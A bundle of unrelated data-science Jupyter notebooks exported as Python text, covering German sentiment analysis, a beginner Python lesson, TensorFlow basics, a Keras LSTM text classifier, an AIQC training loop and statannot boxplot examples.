x in poly.x] tmpx.append(poly.x[0]) tmpy = [y for y in poly.y] tmpy.append(poly.y[0]) ax4.plot(tmpx, tmpy, linestyle='-', color='k', linewidth=1) ax4.fill(tmpx, tmpy, color=color) ax4.text(x+w*0.375, yi_text1, layers1, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='top') ax4.text(x+w*0.375, yi_text2, layers2, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='top') ax4.text(x+w*0.375, yi_text3, density, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='center') plt.tight_layout() #mpl.savefig('../manuscript/figures/A-model-rifted-margin-grafics-estimated-model-alphas_2_1_2_1_2.png', dpi='figure', bbox_inches='tight') plt.show() # -
code/A-model-rifted-margin-model-(figures).ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Sentiment # - Sentiment detection ist bei Texten ein relativ altes Thema # - Seit Deep Learning sind die "alten" Methoden abgeschlagen # - Allerdings ist es nicht ganz trivial einen eigenen Classifier für Deep Learning zu schreiben # - Wenn ihr est trotzdem mal probieren wollt, dann findet ihr eine Anleitung in meinem Blog Post: # - https://www.liip.ch/en/blog/sentiment-detection-with-keras-word-embeddings-and-lstm-deep-learning-networks from textblob_de import TextBlobDE #from textblob import TexBlob TextBlobDE(u"Das Auto ist sehr schön!").sentiment blob = TextBlobDE(u"Das ist ein hässliches Auto.") blob.sentiment blob = TextBlobDE(u"Ich bin furchtbar sauer!") blob.sentiment blob = TextBlobDE(u"Das ist ein neutraler Satz.") blob.sentiment # # Spracherkennung # - wiederum ein einfaches Thema wird z.B. von TextblobDE unterstützt TextBlobDE(u"Ich gehe ins Schwimmbad").detect_language() TextBlobDE(u"Ide plywac").detect_language() TextBlobDE(u"I am going to the swimming pool").detect_language() TextBlobDE("Eu vou ao trem").detect_language() # # Spellchecking # - Geht aktuell leider nur auf englisch. # - Damit könnt ihr zumindest Eure englisch sprachigen Kollegen kontrollieren. from textblob import TextBlob blob = TextBlob(u'Writing easy sentences in english is easy but thei do hafe to be korrekt.') blob.correct() blob.words[10].spellcheck()
14 Text und Machine Learning/2.9 [OPTIONAL] Sentiment, Spracherkennung, Spellchecking.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Print print("Meow, saya adalah kucing") # # Variable pikiran = "saya merasa batal" pikiran pikiran = "saya merasa lapar" pikiran # # Fungsi pikiran.replace("lapar", "ngantuk") pikiran.upper() # kalau pakai fungsi tertentu, nilainya tidak ditimpa(inplace) pikiran = pikiran.replace("lapar", "ngantuk") pikiran def ngegas(x): return x.upper() + "!" ngegas(pikiran) pikiran # # List lokasi = ["meja","sofa","kursi","tv","dapur"] lokasi lokasi[0] lokasi[-1] lokasi.append("kasur") lokasi len(lokasi) #len adalah singkatan dari length # # Slicing lokasi[1:3] lokasi[2:5] lokasi[:4] lokasi[1:] # # Dictionary preferensi = {"susu": "suka", "tikus": "suka", "lemon": "tidak suka"} preferensi preferensi["susu"] preferensi["lemon"] preferensi["jeruk"] = "tidak suka" preferensi preferensi.keys() # # Conditional wadah = "seperti kasur" # + if wadah == "seperti kotak": print("masuk") elif wadah == "seperti bak mandi": print("kabur") else: print("abaikan") # - # # Iterasi jenis_kucing = ["angora","persia","siberia","mesir"] jenis_kucing[0] for jenis in jenis_kucing: print(jenis) for jenis in jenis_kucing: print(jenis.upper() + " adalah jenis kucing") for jenis in jenis_kucing: print(f"kucing {jenis.upper()} adalah jenis kucing") f"{pikiran} adalah sebuah pikiran" # # Latihan: Kucing berhitung for i in range(3, 7): print(i) for i in range(21): if i > 18: print(18) else: print(i) for i in range(21): print(min(i,18))
01 - Python Introduction/Part 2 - Python for cats.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Chapter 3 # ### Our first TensorFlow graph import tensorflow as tf a = tf.constant(5) b = tf.constant(2) c = tf.constant(3) d = tf.multiply(a,b) e = tf.add(c,b) f = tf.subtract(d,e) sess = tf.Session() outs = sess.run(f) sess.close() print("outs = {}".format(outs)) # ### Constructing and managing our graph # + import tensorflow as tf print(tf.get_default_graph()) g = tf.Graph() print(g) # + a = tf.constant(5) print(a.graph is g) print(a.graph is tf.get_default_graph()) # + g1 = tf.get_default_graph() g2 = tf.Graph() print(g1 is tf.get_default_graph()) with g2.as_default(): print(g1 is tf.get_default_graph()) print(g1 is tf.get_default_graph()) # - # ### Fetches # + with tf.Session() as sess: fetches = [a,b,c,d,e,f] outs = sess.run(fetches) print("outs = {}".format(outs)) print(type(outs[0])) # - # ### Nodes are operations, edges are Tensor objects c = tf.constant(4.0) print(c) # ### Data types c = tf.constant(4.0, dtype=tf.float64) print(c) print(c.dtype) x = tf.constant([1,2,3],name='x',dtype=tf.float32) print(x.dtype) x = tf.cast(x,tf.int64) print(x.dtype) # ### Tensor arrays and Shapes # + import numpy as np c = tf.constant([[1,2,3], [4,5,6]]) print("Python List input: {}".format(c.get_shape())) c = tf.constant(np.array([ [[1,2,3], [4,5,6]], [[1,1,1], [2,2,2]] ])) print("3d Numpy array input: {}".format(c.get_shape())) # + import matplotlib.pyplot as plt % matplotlib inline sess = tf.InteractiveSession() # === Noramal and Truncated normal distributions === mean = 0 std = 1 x_normal = tf.random_normal((1,50000),mean,std).eval() x_truncated = tf.truncated_normal((1,50000),mean,std).eval() # === Uniform distribution minval = -2 maxval = 2 x_uniform = tf.random_uniform((1,50000),minval,maxval).eval() sess.close() def simpleaxis(ax): 
ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.get_xaxis().tick_bottom() ax.get_yaxis().tick_left() # ax.set_ylim([-1.1,1.1]) ax.tick_params(axis='both', which='major', labelsize=15) def get_axis_limits(ax, scale=.8): return ax.get_xlim()[1]*scale, ax.get_ylim()[1]*scale f,axarr = plt.subplots(1,3,figsize=[15,4],sharey=True) titles = ['Normal','Truncated Normal','Uniform'] print(x_normal.shape) for i,x in enumerate([x_normal,x_truncated,x_uniform]): ax = axarr[i] ax.hist(x[0],bins=100,color='b',alpha=0.4) ax.set_title(titles[i],fontsize=20) ax.set_xlabel('Values',fontsize=20) ax.set_xlim([-5,5]) ax.set_ylim([0,1800]) simpleaxis(ax) axarr[0].set_ylabel('Frequency',fontsize=20) plt.suptitle('Initialized values',fontsize=30, y=1.15) for ax,letter in zip(axarr,['A','B','C']): simpleaxis(ax) ax.annotate(letter, xy=get_axis_limits(ax),fontsize=35) plt.tight_layout() plt.savefig('histograms.png', bbox_inches='tight', format='png', dpi=200, pad_inches=0,transparent=True) plt.show() # - sess = tf.InteractiveSession() c = tf.linspace(0.0, 4.0, 5) print("The content of 'c':\n {}\n".format(c.eval())) sess.close() # ### Matrix multiplication # + A = tf.constant([ [1,2,3], [4,5,6] ]) print(a.get_shape()) x = tf.constant([1,0,1]) print(x.get_shape()) x = tf.expand_dims(x,1) print(x.get_shape()) b = tf.matmul(A,x) sess = tf.InteractiveSession() print('matmul result:\n {}'.format(b.eval())) sess.close() # - # ### Names with tf.Graph().as_default(): c1 = tf.constant(4,dtype=tf.float64,name='c') c2 = tf.constant(4,dtype=tf.int32,name='c') print(c1.name) print(c2.name) # ### Name scopes # + with tf.Graph().as_default(): c1 = tf.constant(4,dtype=tf.float64,name='c') with tf.name_scope("prefix_name"): c2 = tf.constant(4,dtype=tf.int32,name='c') c3 = tf.constant(4,dtype=tf.float64,name='c') print(c1.name) print(c2.name) print(c3.name) # - # ### Variables # # + init_val = tf.random_normal((1,5),0,1) var = tf.Variable(init_val, name='var') print("pre run: 
\n{}".format(var)) init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) post_var = sess.run(var) print("\npost run: \n{}".format(post_var)) # - # ### New variables are created each time # + init_val = tf.random_normal((1,5),0,1) var = tf.Variable(init_val, name='var') print("pre run: \n{}".format(var)) init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) post_var = sess.run(var) print("\npost run: \n{}".format(post_var)) # - # ### Placeholders # + x_data = np.random.randn(5,10) w_data = np.random.randn(10,1) with tf.Graph().as_default(): x = tf.placeholder(tf.float32,shape=(5,10)) w = tf.placeholder(tf.float32,shape=(10,1)) b = tf.fill((5,1),-1.) xw = tf.matmul(x,w) xwb = xw + b s = tf.reduce_max(xwb) with tf.Session() as sess: outs = sess.run(s,feed_dict={x: x_data,w: w_data}) print("outs = {}".format(outs)) # - # ### Example 1: Linear Regression # + # === Create data and simulate results ===== x_data = np.random.randn(2000,3) w_real = [0.3,0.5,0.1] b_real = -0.2 noise = np.random.randn(1,2000)*0.1 y_data = np.matmul(w_real,x_data.T) + b_real + noise # + NUM_STEPS = 10 g = tf.Graph() wb_ = [] with g.as_default(): x = tf.placeholder(tf.float32,shape=[None,3]) y_true = tf.placeholder(tf.float32,shape=None) with tf.name_scope('inference') as scope: w = tf.Variable([[0,0,0]],dtype=tf.float32,name='weights') b = tf.Variable(0,dtype=tf.float32,name='bias') y_pred = tf.matmul(w,tf.transpose(x)) + b with tf.name_scope('loss') as scope: loss = tf.reduce_mean(tf.square(y_true-y_pred)) with tf.name_scope('train') as scope: learning_rate = 0.5 optimizer = tf.train.GradientDescentOptimizer(learning_rate) train = optimizer.minimize(loss) # Before starting, initialize the variables. We will 'run' this first. 
init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) for step in range(NUM_STEPS): sess.run(train,{x: x_data, y_true: y_data}) if (step % 5 == 0): print(step, sess.run([w,b])) wb_.append(sess.run([w,b])) print(10, sess.run([w,b])) # - # ### Example 2: Logistic Regression # # + N = 20000 def sigmoid(x): return 1 / (1 + np.exp(-x)) # === Create data and simulate results ===== x_data = np.random.randn(N,3) w_real = [0.3,0.5,0.1] b_real = -0.2 wxb = np.matmul(w_real,x_data.T) + b_real y_data_pre_noise = sigmoid(wxb) y_data = np.random.binomial(1,y_data_pre_noise) # + NUM_STEPS = 50 g = tf.Graph() wb_ = [] with g.as_default(): x = tf.placeholder(tf.float32,shape=[None,3]) y_true = tf.placeholder(tf.float32,shape=None) with tf.name_scope('inference') as scope: w = tf.Variable([[0,0,0]],dtype=tf.float32,name='weights') b = tf.Variable(0,dtype=tf.float32,name='bias') y_pred = tf.matmul(w,tf.transpose(x)) + b with tf.name_scope('loss') as scope: loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true,logits=y_pred) loss = tf.reduce_mean(loss) with tf.name_scope('train') as scope: learning_rate = 0.5 optimizer = tf.train.GradientDescentOptimizer(learning_rate) train = optimizer.minimize(loss) # Before starting, initialize the variables. We will 'run' this first. init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) for step in range(NUM_STEPS): sess.run(train,{x: x_data, y_true: y_data}) if (step % 5 == 0): print(step, sess.run([w,b])) wb_.append(sess.run([w,b])) print(50, sess.run([w,b]))
Learning Tensor Flow/03__tensorflow_basics/Chapter3.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
import os, math
import numpy as np
import pandas as pd
import itertools

from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.models import Sequential
# FIX: `Dense` was imported twice on this line.
from keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, CuDNNGRU, Conv1D, CuDNNLSTM
from keras.layers import Bidirectional, GlobalMaxPool1D
from keras.models import Model
from keras import initializers, regularizers, constraints, optimizers, layers

# nltk tokenizer
from nltk.tokenize import RegexpTokenizer

from tqdm import tqdm
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.decomposition import PCA, TruncatedSVD
from sklearn.utils import resample
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report

import matplotlib
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt

# + _uuid="b67995f2cd04efbd86747fbca05dea1450f82e8b"

# + _uuid="0e487c746161cdc8bfaf09a24dd1bb874afef115"
#pd.set_option('display.height', 1000)
#pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
#pd.set_option('display.width', 1000)

# + [markdown] _uuid="575ad3a0505f95215153b70f9dc84c2cd3c011fa"
# ## 1.Explore dataframe features

# + _uuid="2aac670e30274b12dd31c8e06a5d403e45477baf"
train_df = pd.read_csv("../input/train.csv")
# 1. fill up the missing values
test_df =pd.read_csv("../input/test.csv")
print(train_df.head())
print(test_df.head())

# 2. Are there overlaps between train and test? No
print(pd.core.common.intersection(train_df['question_text'], test_df['question_text']).tolist())
print(pd.core.common.intersection(train_df['qid'], test_df['qid']).tolist())

# 3. Some data features
# print('train data',train_df.info())
#print('test data',test_df.info())

# Are there replicated rows? No
#print(train_df.nunique())

# + [markdown] _uuid="eb524f082e35bb9a43c53a07950f8fd45639e67d"
# ## 2. Feature extraction from text

# + _uuid="f13631ca516d65b2d60c8aeee26b93464cfda542"
# 1. Preprocessing: lowercase, stemming, lemmatization, stopwords
def standardize_text(df, question_field):
    """Strip URLs/@mentions and non-alphanumeric noise from `question_field`,
    then lowercase it.  Mutates `df` in place and returns it."""
    df[question_field] = df[question_field].str.replace(r"http\S+", "")
    df[question_field] = df[question_field].str.replace(r"http", "")
    df[question_field] = df[question_field].str.replace(r"@\S+", "")
    df[question_field] = df[question_field].str.replace(r"[^A-Za-z0-9(),!?@\'\`\"\_\n]", " ")
    df[question_field] = df[question_field].str.replace(r"@", "at")
    df[question_field] = df[question_field].str.lower()
    return df

# 2.
train_clean = train_df.copy(deep=True) # deep copy: the original df is not affected
test_clean = test_df.copy(deep=True)
train_clean = standardize_text(train_clean, 'question_text')
test_clean = standardize_text(test_clean, 'question_text')

# 3. Are there overlaps between train and test question_text after preprocessing? Yes
print(pd.core.common.intersection(train_clean['question_text'], test_clean['question_text']).tolist())

# + _uuid="9a70477a85aca0d9df05ac6a6bbc80467c374998"
# Embedding setup
# Source https://blog.keras.io/using-pre-trained-word-embeddings-in-a-keras-model.html
embeddings_index = {}
f = open('../input/embeddings/glove.840B.300d/glove.840B.300d.txt')
for line in tqdm(f):
    values = line.split(" ")
    word = values[0]
    coefs = np.asarray(values[1:], dtype='float32')
    embeddings_index[word] = coefs
f.close()

print('Found %s word vectors.' % len(embeddings_index))

# + _uuid="8f4912b409bd07c66b9b32f99212ad771ba61a63"
train_df, val_df = train_test_split(train_clean, test_size=0.1)

# + _uuid="dddcc226926e60d9eb674ef1c92734a4fa3058ab"
# Convert values to embeddings
def text_to_array(text):
    """Embed the first 30 tokens of `text` as a (30, 300) GloVe matrix,
    zero-padding short questions and unknown words."""
    empyt_emb = np.zeros(300)
    text = text[:-1].split()[:30]
    embeds = [embeddings_index.get(x, empyt_emb) for x in text]
    embeds+= [empyt_emb] * (30 - len(embeds))
    return np.array(embeds)

# train_vects = [text_to_array(X_text) for X_text in tqdm(train_df["question_text"])]
val_vects = np.array([text_to_array(X_text) for X_text in tqdm(val_df["question_text"][:3000])])
val_y = np.array(val_df["target"][:3000])

# + _uuid="4f2311e86d07936b88f8820928cc9adca4633a1f"
# Data providers
batch_size = 64

def batch_gen(train_df):
    """Infinite generator of shuffled (features, labels) training batches."""
    n_batches = math.ceil(len(train_df) / batch_size)
    while True:
        train_df = train_df.sample(frac=1.)  # Shuffle the data.
        for i in range(n_batches):
            texts = train_df.iloc[i*batch_size:(i+1)*batch_size, 1]
            text_arr = np.array([text_to_array(text) for text in texts])
            yield text_arr, np.array(train_df["target"][i*batch_size:(i+1)*batch_size])

# + _uuid="c06041b7ee5792058819c138cc63b825cfa189d3"
from keras.models import Sequential
from keras.layers import CuDNNLSTM, Dense, Bidirectional

# + _uuid="ef50d94d338ef4e7e2309ce12c49e0fb3b811578"
model = Sequential()
model.add(Bidirectional(CuDNNLSTM(64, return_sequences=True),
                        input_shape=(30, 300)))
model.add(Bidirectional(CuDNNLSTM(64)))
model.add(Dense(1, activation="sigmoid"))
model.compile(loss='binary_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])

# + _uuid="f344ba26a37fa4ac83f7f3104bee41bff5617f82"
mg = batch_gen(train_df)
model.fit_generator(mg, epochs=20,
                    steps_per_epoch=1000,
                    validation_data=(val_vects, val_y),
                    verbose=True)

# + _uuid="d1c01b5a704854c36229996b3f894e5f9bfb9092"
# Prediction part
batch_size = 256

# FIX: renamed from `batch_gen` — the original silently shadowed the training
# generator above with one of a different shape (finite, no labels).
def test_batch_gen(test_df):
    """Finite generator of feature batches for inference (no labels)."""
    n_batches = math.ceil(len(test_df) / batch_size)
    for i in range(n_batches):
        texts = test_df.iloc[i*batch_size:(i+1)*batch_size, 1]
        text_arr = np.array([text_to_array(text) for text in texts])
        yield text_arr

test_df = pd.read_csv("../input/test.csv")

all_preds = []
for x in tqdm(test_batch_gen(test_df)):
    all_preds.extend(model.predict(x).flatten())

# + _uuid="ba5fd8920241e54810f5d6bdbfd8b6f4bbf71da2"
# FIX: the deprecated alias np.int was removed in NumPy 1.24; the builtin
# `int` is the equivalent dtype specifier.
y_te = (np.array(all_preds) > 0.5).astype(int)

submit_df = pd.DataFrame({"qid": test_df["qid"], "prediction": y_te})
submit_df.to_csv("submission.csv", index=False)

# + _uuid="cad4d9a7345aff3603e6a65f55b75625fd187d51"
# !head submission.csv

# + _uuid="b8a016529af0d8ff2bcd7887ba20f5de110f81c1"
notebooks/tfidf-lstm-v2-embedding-nosstem.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # TensorFlow2: Training Loop.

# ![gradient](../images/gradient_descent.png)

# Although Keras is suitable for the vast majority of use cases, in the following scenarios, it may make sense to forgo `model.fit()` to manually define a training loop:
#
# - Maintaining legacy code and retraining old models.
# - Custom batch/ epoch operations like gradients and backpropagation. Even then, PyTorch may be a better fit for customization.
#
# > Disclaimer; This notebook demonstrates how to manually define a training loop for queued tuning of a binary classification model. However, it is only included to prove that AIQC technically supports TensorFlow out-of-the-box with `analysis_type='keras'`, and to demonstrate how expert practitioners do continue to use their favorite tools. We neither claim to be experts on the inner-workings of TensorFlow, nor do we intend to troubleshoot advanced methodologies for users that are in over their heads.
#
# Reference this repository for more TensorFlow cookbooks:
# > https://github.com/IvanBongiorni/TensorFlow2.0_Notebooks

# +
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout

from sklearn.preprocessing import LabelBinarizer, PowerTransformer

import aiqc
from aiqc import datum
# -

# ---

# ## Example Data

# Reference [Example Datasets](example_datasets.ipynb) for more information.

df = datum.to_pandas('sonar.csv')

df.head()

# ---

# ## a) High-Level API

# Reference [High-Level API Docs](api_high_level.ipynb) for more information including how to work with non-tabular data.

# Power-transform the float features and binarize the 'object' label;
# hold out 12% for test and 22% for validation.
splitset = aiqc.Pipeline.Tabular.make(
    df_or_path = df
    , dtype = None
    , feature_cols_excluded = 'object'
    , feature_interpolaters = None
    , feature_window = None
    , feature_encoders = dict(
        sklearn_preprocess = PowerTransformer(method='yeo-johnson', copy=False)
        , dtypes = ['float64']
    )
    , feature_reshape_indices = None
    , label_column = 'object'
    , label_interpolater = None
    , label_encoder = dict(sklearn_preprocess = LabelBinarizer(sparse_output=False))
    , size_test = 0.12
    , size_validation = 0.22
    , fold_count = None
    , bin_count = None
)

def fn_build(features_shape, label_shape, **hp):
    """Three hidden-layer MLP with dropout; width comes from hp['neuron_count']."""
    model = Sequential(name='Sonar')
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dropout(0.30))
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dropout(0.30))
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dense(units=label_shape[0], activation='sigmoid', kernel_initializer='glorot_uniform'))
    return model

def fn_lose(**hp):
    """Binary cross-entropy loss for the sigmoid output."""
    loser = tf.losses.BinaryCrossentropy()
    return loser

def fn_optimize(**hp):
    """Adamax optimizer with default settings."""
    optimizer = tf.optimizers.Adamax()
    return optimizer

def fn_train(model, loser, optimizer, samples_train, samples_evaluate, **hp):
    """Manual training loop: per-batch GradientTape updates plus per-epoch
    loss/accuracy bookkeeping that mirrors `keras.Model.fit` history."""
    batched_train_features, batched_train_labels = aiqc.tf_batcher(
        features = samples_train['features']
        , labels = samples_train['labels']
        , batch_size = 5
    )

    # Still necessary for saving entire model.
    model.compile(loss=loser, optimizer=optimizer)

    ## --- Metrics ---
    acc = tf.metrics.BinaryAccuracy()
    # Mirrors `keras.model.History.history` object.
    history = {
        'loss':list(), 'accuracy': list(),
        'val_loss':list(), 'val_accuracy':list()
    }

    ## --- Training loop ---
    for epoch in range(hp['epochs']):
        # --- Batch training ---
        for i, batch in enumerate(batched_train_features):
            with tf.GradientTape() as tape:
                batch_loss = loser(
                    batched_train_labels[i],
                    model(batched_train_features[i])
                )
            # Update weights based on the gradient of the loss function.
            gradients = tape.gradient(batch_loss, model.trainable_variables)
            optimizer.apply_gradients(zip(gradients, model.trainable_variables))

        ## --- Epoch metrics ---
        # Overall performance on training data.
        train_probability = model.predict(samples_train['features'])
        train_loss = loser(samples_train['labels'], train_probability)
        train_acc = acc(samples_train['labels'], train_probability)
        history['loss'].append(float(train_loss))
        history['accuracy'].append(float(train_acc))
        # Performance on evaluation data.
        eval_probability = model.predict(samples_evaluate['features'])
        eval_loss = loser(samples_evaluate['labels'], eval_probability)
        eval_acc = acc(samples_evaluate['labels'], eval_probability)
        history['val_loss'].append(float(eval_loss))
        history['val_accuracy'].append(float(eval_acc))
    # Attach history to the model so we can return a single object.
    model.history.history = history
    return model

hyperparameters = {
    "neuron_count": [25, 50]
    , "epochs": [75, 150]
}

queue = aiqc.Experiment.make(
    library = "keras"
    , analysis_type = "classification_binary"
    , fn_build = fn_build
    , fn_train = fn_train
    , fn_lose = fn_lose
    , fn_optimize = fn_optimize
    , splitset_id = splitset.id
    , repeat_count = 1
    , hide_test = False
    , hyperparameters = hyperparameters
    , fn_predict = None #automated
    , foldset_id = None
)

queue.run_jobs()

# For more information on visualization of performance metrics, reference the [Visualization & Metrics](visualization.html) documentation.

# ---

# ## b) Low-Level API

# FIX: the original linked this section to api_high_level.ipynb.
# Reference [Low-Level API Docs](api_low_level.ipynb) for more information including how to work with non-tabular data and defining optimizers.

dataset = aiqc.Dataset.Tabular.from_pandas(df)

label_column = 'object'

label = dataset.make_label(columns=[label_column])

labelcoder = label.make_labelcoder(
    sklearn_preprocess = LabelBinarizer(sparse_output=False)
)

feature = dataset.make_feature(exclude_columns=[label_column])

encoderset = feature.make_encoderset()

featurecoder_0 = encoderset.make_featurecoder(
    sklearn_preprocess = PowerTransformer(method='yeo-johnson', copy=False)
    , dtypes = ['float64']
)

splitset = aiqc.Splitset.make(
    feature_ids = [feature.id]
    , label_id = label.id
    , size_test = 0.22
    , size_validation = 0.12
)

# The model functions below repeat section a) so this section stays
# self-contained and runnable on its own.
def fn_build(features_shape, label_shape, **hp):
    """Three hidden-layer MLP with dropout; width comes from hp['neuron_count']."""
    model = Sequential(name='Sonar')
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dropout(0.30))
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dropout(0.30))
    model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform'))
    model.add(Dense(units=label_shape[0], activation='sigmoid', kernel_initializer='glorot_uniform'))
    return model

def fn_lose(**hp):
    """Binary cross-entropy loss for the sigmoid output."""
    loser = tf.losses.BinaryCrossentropy()
    return loser

def fn_optimize(**hp):
    """Adamax optimizer with default settings."""
    optimizer = tf.optimizers.Adamax()
    return optimizer

def fn_train(model, loser, optimizer, samples_train, samples_evaluate, **hp):
    """Manual training loop: per-batch GradientTape updates plus per-epoch
    loss/accuracy bookkeeping that mirrors `keras.Model.fit` history."""
    batched_train_features, batched_train_labels = aiqc.tf_batcher(
        features = samples_train['features']
        , labels = samples_train['labels']
        , batch_size = 5
    )

    # Still necessary for saving entire model.
    model.compile(loss=loser, optimizer=optimizer)

    ## --- Metrics ---
    acc = tf.metrics.BinaryAccuracy()
    # Mirrors `keras.model.History.history` object.
    history = {
        'loss':list(), 'accuracy': list(),
        'val_loss':list(), 'val_accuracy':list()
    }

    ## --- Training loop ---
    for epoch in range(hp['epochs']):
        # --- Batch training ---
        for i, batch in enumerate(batched_train_features):
            with tf.GradientTape() as tape:
                batch_loss = loser(
                    batched_train_labels[i],
                    model(batched_train_features[i])
                )
            # Update weights based on the gradient of the loss function.
            gradients = tape.gradient(batch_loss, model.trainable_variables)
            optimizer.apply_gradients(zip(gradients, model.trainable_variables))

        ## --- Epoch metrics ---
        # Overall performance on training data.
        train_probability = model.predict(samples_train['features'])
        train_loss = loser(samples_train['labels'], train_probability)
        train_acc = acc(samples_train['labels'], train_probability)
        history['loss'].append(float(train_loss))
        history['accuracy'].append(float(train_acc))
        # Performance on evaluation data.
        eval_probability = model.predict(samples_evaluate['features'])
        eval_loss = loser(samples_evaluate['labels'], eval_probability)
        eval_acc = acc(samples_evaluate['labels'], eval_probability)
        history['val_loss'].append(float(eval_loss))
        history['val_accuracy'].append(float(eval_acc))
    # Attach history to the model so we can return a single object.
    model.history.history = history
    return model

algorithm = aiqc.Algorithm.make(
    library = "keras"
    , analysis_type = "classification_binary"
    , fn_build = fn_build
    , fn_train = fn_train
    , fn_lose = fn_lose
    , fn_optimize = fn_optimize
)

# FIX: this dict was defined twice back-to-back in the original; one copy removed.
hyperparameters = {
    "neuron_count": [25, 50]
    , "epochs": [75, 150]
}

hyperparamset = algorithm.make_hyperparamset(
    hyperparameters = hyperparameters
)

queue = algorithm.make_queue(
    splitset_id = splitset.id
    , hyperparamset_id = hyperparamset.id
    , repeat_count = 2
)

queue.run_jobs()

# For more information on visualization of performance metrics, reference the [Visualization & Metrics](visualization.html) documentation.
docs/_build/doctrees/nbsphinx/notebooks/tensorflow_binary_classification.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
# %matplotlib inline
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
from statannot import add_stat_annotation
# FIX: pandas.compat.StringIO was removed from pandas (>= 1.0); the stable,
# equivalent import is the standard library's io.StringIO.
from io import StringIO

dfstring = """Index Control "FBS 1%" "FBS 3%"
0 0.494348 1.196539 0.921887
1 0.556027 0.940206 1.153515
2 0.445540 NaN 1.108820
3 0.464731 0.931461 0.956742
4 0.393526 0.894547 1.073090
5 0.479290 NaN 1.099829
6 0.683442 0.936075 NaN
7 0.667166 NaN NaN
8 0.526530 NaN NaN
9 0.499731 NaN NaN"""
data = pd.read_csv(StringIO(dfstring), delim_whitespace=True, index_col=0)
print(data)
# -

# Annotate all three pairwise comparisons with independent t-tests.
ax = sns.boxplot(data=data)
fig = plt.gcf()
test_results = add_stat_annotation(ax, data,
                                   box_pairs=[('Control','FBS 1%'), ('Control','FBS 3%'), ('FBS 1%','FBS 3%')],
                                   test='t-test_ind', text_format='star',
                                   loc='outside', verbose=1)
test_results

# ### Boxplot non-hue

sns.set(style="whitegrid")
df = sns.load_dataset("tips")
x = "day"
y = "total_bill"
order = ['Sun', 'Thur', 'Fri', 'Sat']
ax = sns.boxplot(data=df, x=x, y=y, order=order)
add_stat_annotation(ax, data=df, x=x, y=y, order=order,
                    box_pairs=[("Thur", "Fri"), ("Thur", "Sat"), ("Fri", "Sun")],
                    test='Mann-Whitney', text_format='star',
                    loc='outside', verbose=2)
plt.savefig('example1.png', dpi=300, bbox_inches='tight')

# ### Boxplot with hue

x = "day"
y = "total_bill"
hue = "smoker"
ax = sns.boxplot(data=df, x=x, y=y, hue=hue)
add_stat_annotation(ax, data=df, x=x, y=y, hue=hue,
                    box_pairs=[(("Thur", "No"), ("Fri", "No")),
                               (("Sat", "Yes"), ("Sat", "No")),
                               (("Sun", "No"), ("Thur", "Yes"))],
                    test='t-test_welch', text_format='full',
                    pvalue_format_string='{:.2f}',
                    loc='inside', verbose=2)
plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1))
plt.savefig('example2.png', dpi=300, bbox_inches='tight')

# ### Boxplot with bucketed categories

# pd.cut produces an Interval-valued categorical column with 3 equal-width bins.
df['tip_bucket'] = pd.cut(df['tip'], 3)
df.head()

# +
# In this case we just have to pass the list of categories objects to the add_stat_annotation function.
tip_bucket_list = df['tip_bucket'].unique()
tip_bucket_list
# -

x = "day"
y = "total_bill"
hue = "tip_bucket"
data = df
ax = sns.boxplot(data=df, x=x, y=y, hue=hue)
add_stat_annotation(ax, data=df, x=x, y=y, hue=hue,
                    box_pairs=[(("Sat", tip_bucket_list[2]), ("Fri", tip_bucket_list[0]))],
                    test='t-test_ind', loc='inside', verbose=2)
